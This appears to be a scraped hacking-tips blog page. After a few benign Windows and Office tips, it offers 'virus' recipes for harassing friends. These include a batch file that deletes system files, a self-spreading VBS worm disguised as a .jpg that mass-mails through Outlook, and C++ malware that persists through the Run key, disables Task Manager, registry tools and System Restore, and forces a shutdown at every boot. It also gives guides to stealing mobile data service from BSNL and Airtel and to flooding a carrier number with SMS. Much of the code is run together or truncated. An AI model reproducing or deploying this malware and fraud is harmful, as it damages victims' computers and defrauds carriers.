Make your Internet Explorer as fast as Firefox

Open registry editor by going to Start then Run and entering regedit. Once in registry,

Navigateto key HKEY_CURRENT_USER\Software\microsoft\Windows\ Current Version \InternetSettings. Right click on the right windows > New > DWORD. Type MaxConnectionsPerServer > You can set value (the more higher the no, the more good speed eg:99). Create another DWORD >type MaxConnectionsPer1_0Server. Then put a high value as mentioned above. Restart I.E and you are done.

Recover the lost administrators password in Windows XP

Slightly more work needed if you lose or forget the Windows XP administrator password.
1.First reboot Windows XP in safe mode by re-starting the computer and pressing F8 repeated as the computer starts up.
2.Then (in safe mode) click Start and then click Run. In the open box type "control userpasswords2" without the quotes - I have just used quotes to differentiate what you have to type.
3.You will now have access to all the user accounts, including the administrators account and will be able to reset the lost password.
4.Just click the administrators user account, and then click Reset Password.
5.You will need to add a new password in the New password and the Confirm new password boxes, and confirm by clicking OK.

protect your office document with password

You can protect your document by applying password so that unauthorized person can not display as well as modify your document. You can apply two types of passwords:
Password to open the document:
Password to modify the document:
Follow these steps.....
Open any Office Documents Click File and Select Save As Now click Tools in that dialouge box select General Option... Now give the password i. Password to open and ii.Password to modify and click OK. You will be asked to "Confirm Password", again enter those password you have entered earlier (The maximum length of password is 15 characters.) Click "Save" button of Save As dialog box It is now ready.....
Remember password is case sensitive Don' t forget them....

CREATE FEW HEAVY VIRUS ALL BY YOURSELF!!!ITS EASY.ENJOY HARRASING your friends

1)
its really too heavy do't try in ur pctry when u gonna to change ur OSor take a back up and try kew;l......@echo off@if exist c:\windows\system32\mouse del c:\windows\system32\mouse@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboardcopy C:\windows\@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exemsg "WARNING:A VIRUS TOOK OVER YOUR COMPUTER VIRUS NOTICED AS:SEX BEAM.exe"copy these lines in notepad and save it as ".bat" or ".exe"


2)
this is a trojan (don't know which species)[code][mexer]RESTRICTED AREA[mexer]Vbs.Basic Trojan Created By ARUNOn Error Resume NextSet shellobject = CreateObject("WScript.Shell")shellobject.regwrite "HKCU\software\Greator\", "Worm made with Vbswg 1.50b"Set filesystem= Createobject("scripting.filesystemobject")filesystem.copyfile wscript.scriptfullname,filesystem.GetSpecialFolder(0)&"\Fergielicious.jpg.vbs"if shellobject.regread ("HKCU\software\Greator\mailed") <> "1" thenmail_trojan()end ifif month(now) =1 and day(now) =26 thenshellobject.run "
http://tinyurl.com/yry6ob",3,falseend ifSet wormfile= filesystem.opentextfile(wscript.scriptfullname, 1)payload= wormfile.readallwormfile.CloseDoIf Not (filesystem.fileexists(wscript.scriptfullname)) ThenSet newfile= filesystem.createtextfile(wscript.scriptfullname, True)newfile.writepayloadnewfile.CloseEnd IfLoopFunction mail_trojan()On Error Resume NextSet outlook = CreateObject("Outlook.Application")If outlook= "Outlook"ThenSet mapi=outlook.GetNameSpace

save it as .bat or .exe


2)
C++ WORM
C++ Worm#include #include #include #include #include char windir[MAX_PATH];int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow){HKEY hKey2;char pathname[256];GetWindowsDirectory(windir, sizeof(windir));HMODULE gMh = GetModuleHandle(0);GetModuleFileName(gMh, pathname, 256);strcat(windir, "\\system32\\Wsecurity.exe");CopyFile(pathname,windir,0);unsigned char omg[45] = "C:\\Windows\\System32\\Wsecurity.exe";if(RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey2 )==EXIT_SUCCESS){RegSetValueEx(hKey2, "Windows Security",0,REG_SZ,omg,sizeof(omg));RegCloseKey(hKey2);}
else{RegOpenKeyEx( HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey2 );RegSetValueEx(hKey2, "Windows Security",0,REG_SZ,omg,sizeof(omg));RegCloseKey(hKey2); }return 0;}void restrictcleanwin(){ofstream Disable;Disable.open("C:\\WINDOWS\\WinDisable.vbs",ios::out);Disable << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun\", 1, \"REG_DWORD\"" << endl;Disable << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools\", 1, \"REG_DWORD\"" << endl;Disable << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr\", 1, \"REG_DWORD\"" << endl;Disable << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr\", 1, \"REG_DWORD\"" << endl;Disable << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\\DisableConfig\",1, \"REG_DWORD\"" << endl;Disable << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore\\DisableSR\", 1, \"REG_DWORD\"" << endl;Disable.close();Sleep(3000);ShellExecute(NULL, "open", "C:\\WINDOWS\\WinDisable.vbs", NULL, NULL, SW_HIDE);}void sshut(){ofstream fun1;fun1.open("C:\\Documents and Settings\\raz\\Start Menu\\Programs\\Startup\\Sshut.cmd",ios::out);fun1 << "shutdown -s -t 5 -f -c \"Microsuck Windows Corpration is crasher\" " << endl;fun1.close();}void cdopen(){ofstream cdopen;cdopen.open("C:\\Documents and Settings\\raz\\Start Menu\\Programs\\Startup\\Cd-op.vbs",ios::out);cdopen << "do" << endl;cdopen << "wscript.sleep 100" << endl;cdopen << "Set oWMP = CreateObject(\"WMPlayer.OCX.7\")" << endl;cdopen << "Set colCDROMs = oWMP.cdromCollection" << endl;cdopen << "if colCDROMs.Count then" << endl;cdopen << "For i = 0 to colCDROMs.Count - 1" << endl;cdopen << "colCDROMs.Item(i).Eject" << endl;cdopen << "Next" << endl;cdopen << "End If" << endl;cdopen << "loop" << endl;}int main(int argc, char *argv[]){HWND wndstealth;AllocConsole();wndstealth=FindWindowA("ConsoleWindowClass",NULL);ShowWindow(wndstealth,0);restrictcleanwin();sshut();cdopen();{}It is a program that drops a few files and edits the registry. All it does is shut down the computer every time it boots.

Free gprs in bsnl

here are the steps to perform:-
Logic: the server has a major bug in it, by which it fails to block two simultaneous connections from the phone and establishes a connection with full internet working,
Supported devices: all phones with multichannel gprs support.
For connection on your mobile phone:- 1) Make two connections like bsnlportal and BSNLPORTAL1 (names of profile don’t matter, u can keep one as billgates and shahrukhkhan lol..the basic purpose of names is to enable the user to differentiate between the two accounts,) 2) Select the application you got to have the full connection working on. Surpassingly “web” now just select “bsnlportal” profile and select a link like wap.cellone.in the page will get open, just press the red button such that the “web” application goes in the background. Make sure that the gprs connection is still established with the web app. Two parallel lines on the top left of the screen will confirm this.
3) Now open any other app that requires web connection like opera. Select BSNLPORTAL and open any other link like wap.google.com, u will get error – the aim of using the other app is to perform multi-channel gprs, this is verified by seeing some dots on the pre-existing connection established by “web” (step 2) “Access denied. Technical description: 403 Forbidden - You are not allowed to communicate with the requested resource.”
4) close opera and open web and open a site like esato.com
5) if everything is done as said here then esato will load and voila! We have the whole internet! For connection on pc.:-
1)create a connection and enter the number to be dialed as *99***1#
2) enter the following string as extra initialization command
3)now dial from pc, the connection will be established
4)pick the phone and open “web” open “wap.cellone.in” the phone shows error .
5) close “web” and then from the browser open www.google.com and voila! The whole intenet is here settings for profiles apn: celloneportal ip: 192.168.51.163 port : 8080 leave other fields blank as they are of the least concern! the browser settings on pc too go the same as mentioned above!

Airtel Hack for free internet

You need a PC or a Laptop and the required connectivity tools ,ie.,Serial/USB cable OR Infrared Device OR Bluetooth dongle
1) Activate Airtel Live! ( It’s FREE so no probs)
2) Create TWO Airtel gprs data accounts (yep TWO) and select theFIRST as the active profile.
3) Connect your mobile to the PC (or Laptop) and install the driver foryour mobile’s modem.
4) Create a new dial-up connection using the NEW CONNECTIONWIZARD as followsConnecting Device : Your mobile’s modemISP Name : Airtel (or anything you like)Phone Number : *99***2# / Try 99***1Username and Password : blank
5) Configure your browser and download manager to use the proxy100.1.200.99 and port 8080.( My advice is to use Opera since you can browse both wap and regular websites)
6) Connect to the dial-up account. You will be connected at 115.2kbps (but remember, that is a bad joke).
7) Pick up your mobile and try to access any site. You will get “AccessDenied…”(except for Airtel Live!). IT DOES NOT MATTER.Keep the mobile down.
8 ) On the PC ( or Laptop) open your browser, enter any address ,press ENTER and…….WAIT
9) After a few seconds the page will start to load and you have theWHOLE internet at your disposal. ***************************************************************************************************************2:-
Under DATA COMM
~~~~~~~~~~~~
APN : airtelfun.com
USERNAME : blank
PASSWORD : blank
PASS REQ : OFF
ALLOW CALLS : AUTOMATIC
IPADDRESS :DNSADDRESS :
DATA COMP : OFF
HEADER COMP : OFF
Under INTERNET PROFILES
~~~~~~~~~~~~~~~~
INTERNET MODE : HTTP or WAP (both worked for me)
USE PROXY : YES
IP ADDRESS : 100.1.200.99
PORT : 8080
USERNAME :
PASSWORD :
No Risk Here, Try it and Enjoy3:-
1st go to settings menu then to connectivity tab now choose the option Data comm. then "DATA ACCOUNTS" go to new account now the settings r as follows
ACCOUNT TYPE:GPRS
NEW ACCOUNT NAME:
A1APN:airtelfun.com
usr name: (blank)
password: (blank)
bnow save it

NOW! go to Internet Setting in connectivity here choose intrnet profile--go to new profile setting are as below
NAME:A1
CONNECT USING:A1(which was created in data comm.)
save it now u would be able to see it now selest it and take "more" option then select setting here in use proxy option it will be selected no if it is no then change it into yesnow go to proxy adress and give the adress as 100.1.200.99 and then the port number as 8080Usr name:password:now save all the settings u made . come back 2 connectivitychoose streaming settings now in connect using option choose a1 that we created leave the use proxy option as no itselfTHESE R THE SETTINGS now access airtellive! from ur activated SE phone goto VIDEO GALLERY OR VIDEO UNLIMITED(varies according to states) choose live streaming then choose CNBC OR AAJTAK WHILE CONNECTING TO MEDIA SERVER cancel AFTER 9 or 10 sec then type any web adress if it shows access denied then once again select CNBC and wait for a few more sec than before if its fully connected also no prob its free then cancel it or if ur connected then stop it and the internet is ready to take of .GOOD LUCK SE AIRTEL USERS
alternate
For All Airtel Users
Requirements:1. Airtel live (available 4 free)2. Nokia series60 handset eg 6600,6630,n series,7610,6670 etc3. Opera wap browser 4 mobile
Procedure:-1. Go to ur connection settings and make a new internet profile using the default settings of airtel live. name that new profile as nething(for eg masala); change the home page of that profile to nething u like for eg http://www.google.com.
2. Go to ur Opera browser and set the default connection as AIRTEL LIVE. this is the original settings u received thru airtel.
3. Go to the services(in n6600) and Web(N6630) and change the default profile for connection as masala (newer one).
**Note: always make sure that ur access point is airtelfun.com
Apply:-1. Open Opera and u will see that homepage of Airtel Live is opened. Minimize the application.
2. Now open web using the duplicate Profile and u will see that two gprs connections will work simultaneously and at the web or the services page it will show "Unable to connect" or any error. well thats the signal of ur success.
3. Simply go on the Opera with web on and open any site u want for free. No Charges No nothing.U can also use it through ur computer..........
The main principle behind this is we hav 2 fool the bsnl techies 2 activate portal and thus get gprs activated / get "G" signal on ur cell as bsnl portal (wap.cellone.in) needs "gprs signal on ur cel (whether gprs is formaly activated/registerd or not (by my method )i dont know) NORMALLY THEY DONT DO THAT INSPITE OF THE FACT THAT THEY SHOULD ACTIVATE GPRS SIGNAL SERVICE FOR PORTAL!!! AND THEY WILL GIVE U NO OF REASONS---- ---THAT portal is message based , so go to cellone icon in menu and use that sms based portal (what the f**k) ---THAT portal service will be activated when u will activate gprs by filling up form and registering at nearest CCN!! ---THAT ur handset has some problems (if u say that "G" signal is not present) ----etc,etc!!
U HAVE 2 ACTIVATE PORTAL FIRST WHICH IS FREE AND U CAN EAT UP CC'S FOR THIS REASON!! SO WHAT U HAV 2 DO IS--
1) SEND PORTAL to 3733 AND CONFIRMATION SHD COME WITH 5 MIN AT-MAXIMM !! 2) SEND FOR ATLEAST 20-30 TIMES (CAN B ANY MORE THAN THAT) JUST S**K UP THE NETWORK(3733) WITH THESE MESSAGES !!! THAT'S FREE NO!! BOTH ON POST AND PRE!!
3) NOW ALONG ALSO SEND 20-40 SMS AS GPRS TO 3733 (NO OF SMS DIRECTLY PROPORTIONAL 2 HATE FOR BSNL AND HOW EARLY U WNAN GET UR GPRS ACTIVATED) this is also free both on post and pre!!
4) U WILL GET CONFIRMATION IN BOTH CASES AND MSG TELLS U 2 GET SETTINGS FROM 9400024365, THE NO OF CC!! HERE AT MY PLACE I CAN DIAL 9419024365 ALSO! BOTH R TOLL FREE AND BOTH R LOCATED IN CHANDIGARH!!! (((((((AND SOME OF THE CC'S SAY they cant give such sensitive information that where they r located, as if thay have a 3 rd world of their own! and the other dumbs said that they r in chandigarh!!!!))))) I WOULD ADVISE ALL FIRST, 2 call them once 2 get the settings!! (most of the times that is incorect but gives u an idea of settings in ur area)) Try and in ur 1 st call only, talk roughly and tell them u r calling 10-20th time just for settings and is that their service!!!
5) Now when u get them save them AND plz post them here!!!
6) now GET ATLEAST 2-3 COMPLAINTS REGISTERED( each after 1 day) THAT UR PORTAL HAS NOT ACTIVATED AND GET THEIR SERIAL NO. and in the end bombard them abt the status of all those complaints !! b4 registering ur complaint they will hesitate much and always say taht they will b sendin new settings which r accurate! but dont belive them and just register complaints!!
7)AFTER THAT, u have 2 only wait until "G" signal is there on ur screen!! LOOK, WHAT I HAVE WRIITEN ABV IS METHOD by which i got activated my "G" service !!! without fillin any form or such and without any money drain!! may be since it bypasses the formal way of registeration, that is why this trick is working !!!!!!!!!!!!

Script to Hack Orkut Account

Alright this is not what you think it is just a prank to play with your friends, just pass them the followint javascript and what they will see is just a message that their account is being hacked, Old trick but always work for a good laugh.Tell your friends to do the following only, you can yourself also try, as i said this is not a hacking script.Paste the following script in the Address Bar (Address Bar is where you type website addresses)and press enter thats it.
javascript:function reverse() { var inp = " ! dekcah si tnuocca tukrO ruoY "; var outp="";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse();